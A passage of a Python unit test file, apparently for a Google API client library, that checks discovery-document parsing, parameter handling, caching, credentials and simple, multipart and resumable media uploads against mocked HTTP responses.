self.zoo_schema = Schemas(self.zoo_root_desc)
def test_key2param(self):
self.assertEqual('max_results', key2param('max-results'))
self.assertEqual('x007_bond', key2param('007-bond'))
def _base_fix_up_parameters_test(
self, method_desc, http_method, root_desc, schema):
self.assertEqual(method_desc['httpMethod'], http_method)
method_desc_copy = copy.deepcopy(method_desc)
self.assertEqual(method_desc, method_desc_copy)
parameters = _fix_up_parameters(method_desc_copy, root_desc, http_method,
schema)
self.assertNotEqual(method_desc, method_desc_copy)
for param_name in STACK_QUERY_PARAMETERS:
self.assertEqual(STACK_QUERY_PARAMETER_DEFAULT_VALUE,
parameters[param_name])
for param_name, value in six.iteritems(root_desc.get('parameters', {})):
self.assertEqual(value, parameters[param_name])
return parameters
def test_fix_up_parameters_get(self):
parameters = self._base_fix_up_parameters_test(
self.zoo_get_method_desc, 'GET', self.zoo_root_desc, self.zoo_schema)
# Since http_method is 'GET'
self.assertFalse('body' in parameters)
def test_fix_up_parameters_insert(self):
parameters = self._base_fix_up_parameters_test(
self.zoo_insert_method_desc, 'POST', self.zoo_root_desc, self.zoo_schema)
body = {
'description': 'The request body.',
'type': 'object',
'$ref': 'Animal',
}
self.assertEqual(parameters['body'], body)
def test_fix_up_parameters_check_body(self):
dummy_root_desc = {}
dummy_schema = {
'Request': {
'properties': {
"description": "Required. Dummy parameter.",
"type": "string"
}
}
}
no_payload_http_method = 'DELETE'
with_payload_http_method = 'PUT'
invalid_method_desc = {'response': 'Who cares'}
valid_method_desc = {
'request': {
'key1': 'value1',
'key2': 'value2',
'$ref': 'Request'
}
}
parameters = _fix_up_parameters(invalid_method_desc, dummy_root_desc,
no_payload_http_method, dummy_schema)
self.assertFalse('body' in parameters)
parameters = _fix_up_parameters(valid_method_desc, dummy_root_desc,
no_payload_http_method, dummy_schema)
self.assertFalse('body' in parameters)
parameters = _fix_up_parameters(invalid_method_desc, dummy_root_desc,
with_payload_http_method, dummy_schema)
self.assertFalse('body' in parameters)
parameters = _fix_up_parameters(valid_method_desc, dummy_root_desc,
with_payload_http_method, dummy_schema)
body = {
'description': 'The request body.',
'type': 'object',
'$ref': 'Request',
'key1': 'value1',
'key2': 'value2',
}
self.assertEqual(parameters['body'], body)
def test_fix_up_parameters_optional_body(self):
# Request with no parameters
dummy_schema = {'Request': {'properties': {}}}
method_desc = {'request': {'$ref': 'Request'}}
parameters = _fix_up_parameters(method_desc, {}, 'POST', dummy_schema)
def _base_fix_up_method_description_test(
self, method_desc, initial_parameters, final_parameters,
final_accept, final_max_size, final_media_path_url):
fake_root_desc = {'rootUrl': 'http://root/',
'servicePath': 'fake/'}
fake_path_url = 'fake-path/'
accept, max_size, media_path_url = _fix_up_media_upload(
method_desc, fake_root_desc, fake_path_url, initial_parameters)
self.assertEqual(accept, final_accept)
self.assertEqual(max_size, final_max_size)
self.assertEqual(media_path_url, final_media_path_url)
self.assertEqual(initial_parameters, final_parameters)
def test_fix_up_media_upload_no_initial_invalid(self):
invalid_method_desc = {'response': 'Who cares'}
self._base_fix_up_method_description_test(invalid_method_desc, {}, {},
[], 0, None)
def test_fix_up_media_upload_no_initial_valid_minimal(self):
valid_method_desc = {'mediaUpload': {'accept': []}}
final_parameters = {'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
self._base_fix_up_method_description_test(
valid_method_desc, {}, final_parameters, [], 0,
'http://root/upload/fake/fake-path/')
def test_fix_up_media_upload_no_initial_valid_full(self):
valid_method_desc = {'mediaUpload': {'accept': ['*/*'], 'maxSize': '10GB'}}
final_parameters = {'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
ten_gb = 10 * 2**30
self._base_fix_up_method_description_test(
valid_method_desc, {}, final_parameters, ['*/*'],
ten_gb, 'http://root/upload/fake/fake-path/')
def test_fix_up_media_upload_with_initial_invalid(self):
invalid_method_desc = {'response': 'Who cares'}
initial_parameters = {'body': {}}
self._base_fix_up_method_description_test(
invalid_method_desc, initial_parameters,
initial_parameters, [], 0, None)
def test_fix_up_media_upload_with_initial_valid_minimal(self):
valid_method_desc = {'mediaUpload': {'accept': []}}
initial_parameters = {'body': {}}
final_parameters = {'body': {},
'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
self._base_fix_up_method_description_test(
valid_method_desc, initial_parameters, final_parameters, [], 0,
'http://root/upload/fake/fake-path/')
def test_fix_up_media_upload_with_initial_valid_full(self):
valid_method_desc = {'mediaUpload': {'accept': ['*/*'], 'maxSize': '10GB'}}
initial_parameters = {'body': {}}
final_parameters = {'body': {},
'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
ten_gb = 10 * 2**30
self._base_fix_up_method_description_test(
valid_method_desc, initial_parameters, final_parameters, ['*/*'],
ten_gb, 'http://root/upload/fake/fake-path/')
def test_fix_up_method_description_get(self):
result = _fix_up_method_description(self.zoo_get_method_desc,
self.zoo_root_desc, self.zoo_schema)
path_url = 'query'
http_method = 'GET'
method_id = 'bigquery.query'
accept = []
max_size = 0
media_path_url = None
self.assertEqual(result, (path_url, http_method, method_id, accept,
max_size, media_path_url))
def test_fix_up_method_description_insert(self):
result = _fix_up_method_description(self.zoo_insert_method_desc,
self.zoo_root_desc, self.zoo_schema)
path_url = 'animals'
http_method = 'POST'
method_id = 'zoo.animals.insert'
accept = ['image/png']
max_size = 1024
media_path_url = 'https://www.googleapis.com/upload/zoo/v1/animals'
self.assertEqual(result, (path_url, http_method, method_id, accept,
max_size, media_path_url))
def test_urljoin(self):
# We want to exhaustively test various URL combinations.
simple_bases = ['https://www.googleapis.com', 'https://www.googleapis.com/']
long_urls = ['foo/v1/bar:custom?alt=json', '/foo/v1/bar:custom?alt=json']
long_bases = [
'https://www.googleapis.com/foo/v1',
'https://www.googleapis.com/foo/v1/',
]
simple_urls = ['bar:custom?alt=json', '/bar:custom?alt=json']
final_url = 'https://www.googleapis.com/foo/v1/bar:custom?alt=json'
for base, url in itertools.product(simple_bases, long_urls):
self.assertEqual(final_url, _urljoin(base, url))
for base, url in itertools.product(long_bases, simple_urls):
self.assertEqual(final_url, _urljoin(base, url))
def test_ResourceMethodParameters_zoo_get(self):
parameters = ResourceMethodParameters(self.zoo_get_method_desc)
param_types = {'a': 'any',
'b': 'boolean',
'e': 'string',
'er': 'string',
'i': 'integer',
'n': 'number',
'o': 'object',
'q': 'string',
'rr': 'string'}
keys = list(param_types.keys())
self.assertEqual(parameters.argmap, dict((key, key) for key in keys))
self.assertEqual(parameters.required_params, [])
self.assertEqual(sorted(parameters.repeated_params), ['er', 'rr'])
self.assertEqual(parameters.pattern_params, {'rr': '[a-z]+'})
self.assertEqual(sorted(parameters.query_params),
['a', 'b', 'e', 'er', 'i', 'n', 'o', 'q', 'rr'])
self.assertEqual(parameters.path_params, set())
self.assertEqual(parameters.param_types, param_types)
enum_params = {'e': ['foo', 'bar'],
'er': ['one', 'two', 'three']}
self.assertEqual(parameters.enum_params, enum_params)
def test_ResourceMethodParameters_zoo_animals_patch(self):
method_desc = self.zoo_animals_resource['methods']['patch']
parameters = ResourceMethodParameters(method_desc)
param_types = {'name': 'string'}
keys = list(param_types.keys())
self.assertEqual(parameters.argmap, dict((key, key) for key in keys))
self.assertEqual(parameters.required_params, ['name'])
self.assertEqual(parameters.repeated_params, [])
self.assertEqual(parameters.pattern_params, {})
self.assertEqual(parameters.query_params, [])
self.assertEqual(parameters.path_params, set(['name']))
self.assertEqual(parameters.param_types, param_types)
self.assertEqual(parameters.enum_params, {})
class DiscoveryErrors(unittest.TestCase):
def test_tests_should_be_run_with_strict_positional_enforcement(self):
try:
plus = build('plus', 'v1', None)
self.fail("should have raised a TypeError exception over missing http=.")
except TypeError:
pass
def test_failed_to_parse_discovery_json(self):
self.http = HttpMock(datafile('malformed.json'), {'status': '200'})
try:
plus = build('plus', 'v1', http=self.http, cache_discovery=False)
self.fail("should have raised an exception over malformed JSON.")
except InvalidJsonError:
pass
def test_unknown_api_name_or_version(self):
http = HttpMockSequence([
({'status': '404'}, open(datafile('zoo.json'), 'rb').read()),
({'status': '404'}, open(datafile('zoo.json'), 'rb').read()),
])
with self.assertRaises(UnknownApiNameOrVersion):
plus = build('plus', 'v1', http=http, cache_discovery=False)
def test_credentials_and_http_mutually_exclusive(self):
http = HttpMock(datafile('plus.json'), {'status': '200'})
with self.assertRaises(ValueError):
build(
'plus', 'v1', http=http, credentials=mock.sentinel.credentials)
class DiscoveryFromDocument(unittest.TestCase):
MOCK_CREDENTIALS = mock.Mock(spec=google.auth.credentials.Credentials)
def test_can_build_from_local_document(self):
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=self.MOCK_CREDENTIALS)
self.assertTrue(plus is not None)
self.assertTrue(hasattr(plus, 'activities'))
def test_can_build_from_local_deserialized_document(self):
discovery = open(datafile('plus.json')).read()
discovery = json.loads(discovery)
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=self.MOCK_CREDENTIALS)
self.assertTrue(plus is not None)
self.assertTrue(hasattr(plus, 'activities'))
def test_building_with_base_remembers_base(self):
discovery = open(datafile('plus.json')).read()
base = "https://www.example.com/"
plus = build_from_document(
discovery, base=base, credentials=self.MOCK_CREDENTIALS)
self.assertEquals("https://www.googleapis.com/plus/v1/", plus._baseUrl)
def test_building_with_optional_http_with_authorization(self):
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=self.MOCK_CREDENTIALS)
# plus service requires Authorization, hence we expect to see AuthorizedHttp object here
self.assertIsInstance(plus._http, google_auth_httplib2.AuthorizedHttp)
self.assertIsInstance(plus._http.http, httplib2.Http)
self.assertIsInstance(plus._http.http.timeout, int)
self.assertGreater(plus._http.http.timeout, 0)
def test_building_with_optional_http_with_no_authorization(self):
discovery = open(datafile('plus.json')).read()
# Cleanup auth field, so we would use plain http client
discovery = json.loads(discovery)
discovery['auth'] = {}
discovery = json.dumps(discovery)
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=None)
# plus service requires Authorization
self.assertIsInstance(plus._http, httplib2.Http)
self.assertIsInstance(plus._http.timeout, int)
self.assertGreater(plus._http.timeout, 0)
def test_building_with_explicit_http(self):
http = HttpMock()
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/", http=http)
self.assertEquals(plus._http, http)
def test_building_with_developer_key_skips_adc(self):
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/", developerKey='123')
self.assertIsInstance(plus._http, httplib2.Http)
# It should not be an AuthorizedHttp, because that would indicate that
# application default credentials were used.
self.assertNotIsInstance(plus._http, google_auth_httplib2.AuthorizedHttp)
class DiscoveryFromHttp(unittest.TestCase):
def setUp(self):
self.old_environ = os.environ.copy()
def tearDown(self):
os.environ = self.old_environ
def test_userip_is_added_to_discovery_uri(self):
# build() will raise an HttpError on a 400, use this to pick the request uri
# out of the raised exception.
os.environ['REMOTE_ADDR'] = '10.0.0.1'
try:
http = HttpMockSequence([
({'status': '400'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, developerKey=None,
discoveryServiceUrl='http://example.com')
self.fail('Should have raised an exception.')
except HttpError as e:
self.assertEqual(e.uri, 'http://example.com?userIp=10.0.0.1')
def test_userip_missing_is_not_added_to_discovery_uri(self):
# build() will raise an HttpError on a 400, use this to pick the request uri
# out of the raised exception.
try:
http = HttpMockSequence([
({'status': '400'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, developerKey=None,
discoveryServiceUrl='http://example.com')
self.fail('Should have raised an exception.')
except HttpError as e:
self.assertEqual(e.uri, 'http://example.com')
def test_key_is_added_to_discovery_uri(self):
# build() will raise an HttpError on a 400, use this to pick the request uri
# out of the raised exception.
try:
http = HttpMockSequence([
({'status': '400'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, developerKey='foo',
discoveryServiceUrl='http://example.com')
self.fail('Should have raised an exception.')
except HttpError as e:
self.assertEqual(e.uri, 'http://example.com?key=foo')
def test_discovery_loading_from_v2_discovery_uri(self):
http = HttpMockSequence([
({'status': '404'}, 'Not found'),
({'status': '200'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, cache_discovery=False)
self.assertTrue(hasattr(zoo, 'animals'))
class DiscoveryFromAppEngineCache(unittest.TestCase):
def test_appengine_memcache(self):
# Hack module import
self.orig_import = __import__
self.mocked_api = mock.MagicMock()
def import_mock(name, *args, **kwargs):
if name == 'google.appengine.api':
return self.mocked_api
return self.orig_import(name, *args, **kwargs)
import_fullname = '__builtin__.__import__'
if sys.version_info[0] >= 3:
import_fullname = 'builtins.__import__'
with mock.patch(import_fullname, side_effect=import_mock):
namespace = 'google-api-client'
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
self.mocked_api.memcache.get.return_value = None
plus = build('plus', 'v1', http=self.http)
# memcache.get is called once
url = 'https://www.googleapis.com/discovery/v1/apis/plus/v1/rest'
self.mocked_api.memcache.get.assert_called_once_with(url,
namespace=namespace)
# memcache.set is called once
with open(datafile('plus.json')) as f:
content = f.read()
self.mocked_api.memcache.set.assert_called_once_with(
url, content, time=DISCOVERY_DOC_MAX_AGE, namespace=namespace)
# Returns the cached content this time.
self.mocked_api.memcache.get.return_value = content
# Make sure the contents are returned from the cache.
# (Otherwise it should through an error)
self.http = HttpMock(None, {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# memcache.get is called twice
self.mocked_api.memcache.get.assert_has_calls(
[mock.call(url, namespace=namespace),
mock.call(url, namespace=namespace)])
# memcahce.set is called just once
self.mocked_api.memcache.set.assert_called_once_with(
url, content, time=DISCOVERY_DOC_MAX_AGE,namespace=namespace)
class DictCache(Cache):
def __init__(self):
self.d = {}
def get(self, url):
return self.d.get(url, None)
def set(self, url, content):
self.d[url] = content
def contains(self, url):
return url in self.d
class DiscoveryFromFileCache(unittest.TestCase):
def test_file_based_cache(self):
cache = mock.Mock(wraps=DictCache())
with mock.patch('googleapiclient.discovery_cache.autodetect',
return_value=cache):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# cache.get is called once
url = 'https://www.googleapis.com/discovery/v1/apis/plus/v1/rest'
cache.get.assert_called_once_with(url)
# cache.set is called once
with open(datafile('plus.json')) as f:
content = f.read()
cache.set.assert_called_once_with(url, content)
# Make sure there is a cache entry for the plus v1 discovery doc.
self.assertTrue(cache.contains(url))
# Make sure the contents are returned from the cache.
# (Otherwise it should through an error)
self.http = HttpMock(None, {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# cache.get is called twice
cache.get.assert_has_calls([mock.call(url), mock.call(url)])
# cahce.set is called just once
cache.set.assert_called_once_with(url, content)
class Discovery(unittest.TestCase):
def test_method_error_checking(self):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# Missing required parameters
try:
plus.activities().list()
self.fail()
except TypeError as e:
self.assertTrue('Missing' in str(e))
# Missing required parameters even if supplied as None.
try:
plus.activities().list(collection=None, userId=None)
self.fail()
except TypeError as e:
self.assertTrue('Missing' in str(e))
# Parameter doesn't match regex
try:
plus.activities().list(collection='not_a_collection_name', userId='me')
self.fail()
except TypeError as e:
self.assertTrue('not an allowed value' in str(e))
# Unexpected parameter
try:
plus.activities().list(flubber=12)
self.fail()
except TypeError as e:
self.assertTrue('unexpected' in str(e))
def _check_query_types(self, request):
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['q'], ['foo'])
self.assertEqual(q['i'], ['1'])
self.assertEqual(q['n'], ['1.0'])
self.assertEqual(q['b'], ['false'])
self.assertEqual(q['a'], ['[1, 2, 3]'])
self.assertEqual(q['o'], ['{\'a\': 1}'])
self.assertEqual(q['e'], ['bar'])
def test_type_coercion(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.query(
q="foo", i=1.0, n=1.0, b=0, a=[1,2,3], o={'a':1}, e='bar')
self._check_query_types(request)
request = zoo.query(
q="foo", i=1, n=1, b=False, a=[1,2,3], o={'a':1}, e='bar')
self._check_query_types(request)
request = zoo.query(
q="foo", i="1", n="1", b="", a=[1,2,3], o={'a':1}, e='bar', er='two')
request = zoo.query(
q="foo", i="1", n="1", b="", a=[1,2,3], o={'a':1}, e='bar',
er=['one', 'three'], rr=['foo', 'bar'])
self._check_query_types(request)
# Five is right out.
self.assertRaises(TypeError, zoo.query, er=['one', 'five'])
def test_optional_stack_query_parameters(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.query(trace='html', fields='description')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['trace'], ['html'])
self.assertEqual(q['fields'], ['description'])
def test_string_params_value_of_none_get_dropped(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.query(trace=None, fields='description')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertFalse('trace' in q)
def test_model_added_query_parameters(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().get(name='Lion')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['alt'], ['json'])
self.assertEqual(request.headers['accept'], 'application/json')
def test_fallback_to_raw_model(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().getmedia(name='Lion')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertTrue('alt' not in q)
self.assertEqual(request.headers['accept'], '*/*')
def test_patch(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().patch(name='lion', body='{"description": "foo"}')
self.assertEqual(request.method, 'PATCH')
def test_batch_request_from_discovery(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
# zoo defines a batchPath
zoo = build('zoo', 'v1', http=self.http)
batch_request = zoo.new_batch_http_request()
self.assertEqual(batch_request._batch_uri,
"https://www.googleapis.com/batchZoo")
def test_batch_request_from_default(self):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
# plus does not define a batchPath
plus = build('plus', 'v1', http=self.http)
batch_request = plus.new_batch_http_request()
self.assertEqual(batch_request._batch_uri,
"https://www.googleapis.com/batch")
def test_tunnel_patch(self):
http = HttpMockSequence([
({'status': '200'}, open(datafile('zoo.json'), 'rb').read()),
({'status': '200'}, 'echo_request_headers_as_json'),
])
http = tunnel_patch(http)
zoo = build('zoo', 'v1', http=http, cache_discovery=False)
resp = zoo.animals().patch(
name='lion', body='{"description": "foo"}').execute()
self.assertTrue('x-http-method-override' in resp)
def test_plus_resources(self):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
plus = build('plus', 'v1', http=self.http)
self.assertTrue(getattr(plus, 'activities'))
self.assertTrue(getattr(plus, 'people'))
def test_oauth2client_credentials(self):
credentials = mock.Mock(spec=GoogleCredentials)
credentials.create_scoped_required.return_value = False
discovery = open(datafile('plus.json')).read()
service = build_from_document(discovery, credentials=credentials)
self.assertEqual(service._http, credentials.authorize.return_value)
def test_google_auth_credentials(self):
credentials = mock.Mock(spec=google.auth.credentials.Credentials)
discovery = open(datafile('plus.json')).read()
service = build_from_document(discovery, credentials=credentials)
self.assertIsInstance(service._http, google_auth_httplib2.AuthorizedHttp)
self.assertEqual(service._http.credentials, credentials)
def test_no_scopes_no_credentials(self):
# Zoo doesn't have scopes
discovery = open(datafile('zoo.json')).read()
service = build_from_document(discovery)
# Should be an ordinary httplib2.Http instance and not AuthorizedHttp.
self.assertIsInstance(service._http, httplib2.Http)
def test_full_featured(self):
# Zoo should exercise all discovery facets
# and should also have no future.json file.
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'animals'))
request = zoo.animals().list(name='bat', projection="full")
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['name'], ['bat'])
self.assertEqual(q['projection'], ['full'])
def test_nested_resources(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'animals'))
request = zoo.my().favorites().list(max_results="5")
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['max-results'], ['5'])
@unittest.skipIf(six.PY3, 'print is not a reserved name in Python 3')
def test_methods_with_reserved_names(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'animals'))
request = zoo.global_().print_().assert_(max_results="5")
parsed = urlparse(request.uri)
self.assertEqual(parsed[2], '/zoo/v1/global/print/assert')
def test_top_level_functions(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'query'))
request = zoo.query(q="foo")
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['q'], ['foo'])
def test_simple_media_uploads(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
doc = getattr(zoo.animals().insert, '__doc__')
self.assertTrue('media_body' in doc)
def test_simple_media_upload_no_max_size_provided(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().crossbreed(media_body=datafile('small.png'))
self.assertEquals('image/png', request.headers['content-type'])
self.assertEquals(b'PNG', request.body[1:4])
def test_simple_media_raise_correct_exceptions(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
try:
zoo.animals().insert(media_body=datafile('smiley.png'))
self.fail("should throw exception if media is too large.")
except MediaUploadSizeError:
pass
try:
zoo.animals().insert(media_body=datafile('small.jpg'))
self.fail("should throw exception if mimetype is unacceptable.")
except UnacceptableMimeTypeError:
pass
def test_simple_media_good_upload(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().insert(media_body=datafile('small.png'))
self.assertEquals('image/png', request.headers['content-type'])
self.assertEquals(b'PNG', request.body[1:4])
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=media&alt=json',
request.uri)
def test_simple_media_unknown_mimetype(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
try:
zoo.animals().insert(media_body=datafile('small-png'))
self.fail("should throw exception if mimetype is unknown.")
except UnknownFileType:
pass
request = zoo.animals().insert(media_body=datafile('small-png'),
media_mime_type='image/png')
self.assertEquals('image/png', request.headers['content-type'])
self.assertEquals(b'PNG', request.body[1:4])
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=media&alt=json',
request.uri)
def test_multipart_media_raise_correct_exceptions(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
try:
zoo.animals().insert(media_body=datafile('smiley.png'), body={})
self.fail("should throw exception if media is too large.")
except MediaUploadSizeError:
pass
try:
zoo.animals().insert(media_body=datafile('small.jpg'), body={})
self.fail("should throw exception if mimetype is unacceptable.")
except UnacceptableMimeTypeError:
pass
def test_multipart_media_good_upload(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().insert(media_body=datafile('small.png'), body={})
self.assertTrue(request.headers['content-type'].startswith(
'multipart/related'))
with open(datafile('small.png'), 'rb') as f:
contents = f.read()
boundary = re.match(b'--=+([^=]+)', request.body).group(1)
self.assertEqual(
request.body.rstrip(b"\n"), # Python 2.6 does not add a trailing \n
b'--===============' + boundary + b'==\n' +
b'Content-Type: application/json\n' +
b'MIME-Version: 1.0\n\n' +
b'{"data": {}}\n' +
b'--===============' + boundary + b'==\n' +
b'Content-Type: image/png\n' +
b'MIME-Version: 1.0\n' +
b'Content-Transfer-Encoding: binary\n\n' +
contents +
b'\n--===============' + boundary + b'==--')
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=multipart&alt=json',
request.uri)
def test_media_capable_method_without_media(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().insert(body={})
self.assertTrue(request.headers['content-type'], 'application/json')
def test_resumable_multipart_media_good_upload(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body={})
self.assertTrue(request.headers['content-type'].startswith(
'application/json'))
self.assertEquals('{"data": {}}', request.body)
self.assertEquals(media_upload, request.resumable)
self.assertEquals('image/png', request.resumable.mimetype())
self.assertNotEquals(request.body, None)
self.assertEquals(request.resumable_uri, None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2'}, ''),
({'status': '308',
'location': 'http://upload.example.com/3',
'range': '0-12'}, ''),
({'status': '308',
'location': 'http://upload.example.com/4',
'range': '0-%d' % (media_upload.size() - 2)}, ''),
({'status': '200'}, '{"foo": "bar"}'),
])
status, body = request.next_chunk(http=http)
self.assertEquals(None, body)
self.assertTrue(isinstance(status, MediaUploadProgress))
self.assertEquals(0, status.resumable_progress)
# Two requests should have been made and the resumable_uri should have been
# updated for each one.
self.assertEquals(request.resumable_uri, 'http://upload.example.com/2')
self.assertEquals(media_upload, request.resumable)
self.assertEquals(0, request.resumable_progress)
# This next chuck call should upload the first chunk
status, body = request.next_chunk(http=http)
self.assertEquals(request.resumable_uri, 'http://upload.example.com/3')
self.assertEquals(media_upload, request.resumable)
self.assertEquals(13, request.resumable_progress)
# This call will upload the next chunk
status, body = request.next_chunk(http=http)
self.assertEquals(request.resumable_uri, 'http://upload.example.com/4')
self.assertEquals(media_upload.size()-1, request.resumable_progress)
self.assertEquals('{"data": {}}', request.body)
# Final call to next_chunk should complete the upload.
status, body = request.next_chunk(http=http)
self.assertEquals(body, {"foo": "bar"})
self.assertEquals(status, None)
def test_resumable_media_good_upload(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
self.assertEquals(media_upload, request.resumable)
self.assertEquals('image/png', request.resumable.mimetype())
self.assertEquals(request.body, None)
self.assertEquals(request.resumable_uri, None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-12'}, ''),
({'status': '308',
'location': 'http://upload.example.com/3',
'range': '0-%d' % (media_upload.size() - 2)}, ''),
({'status': '200'}, '{"foo": "bar"}'),
])
status, body = request.next_chunk(http=http)
self.assertEquals(None, body)
self.assertTrue(isinstance(status, MediaUploadProgress))
self.assertEquals(13, status.resumable_progress)
# Two requests should have been made and the resumable_uri should have been
# updated for each one.
self.assertEquals(request.resumable_uri, 'http://upload.example.com/2')
self.assertEquals(media_upload, request.resumable)
self.assertEquals(13, request.resumable_progress)
status, body = request.next_chunk(http=http)
self.assertEquals(request.resumable_uri, 'http://upload.example.com/3')
self.assertEquals(media_upload.size()-1, request.resumable_progress)
self.assertEquals(request.body, None)
# Final call to next_chunk should complete the upload.
status, body = request.next_chunk(http=http)
self.assertEquals(body, {"foo": "bar"})
self.assertEquals(status, None)
def test_resumable_media_good_upload_from_execute(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=resumable&alt=json',
request.uri)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-12'}, ''),
({'status': '308',
'location': 'http://upload.example.com/3',
'range': '0-%d' % media_upload.size()}, ''),
({'status': '200'}, '{"foo": "bar"}'),
])
body = request.execute(http=http)
self.assertEquals(body, {"foo": "bar"})
def test_resumable_media_fail_unknown_response_code_first_request(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
http = HttpMockSequence([
({'status': '400',
'location': 'http://upload.example.com'}, ''),
])
try:
request.execute(http=http)
self.fail('Should have raised ResumableUploadError.')
except ResumableUploadError as e:
self.assertEqual(400, e.resp.status)
def test_resumable_media_fail_unknown_response_code_subsequent_request(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
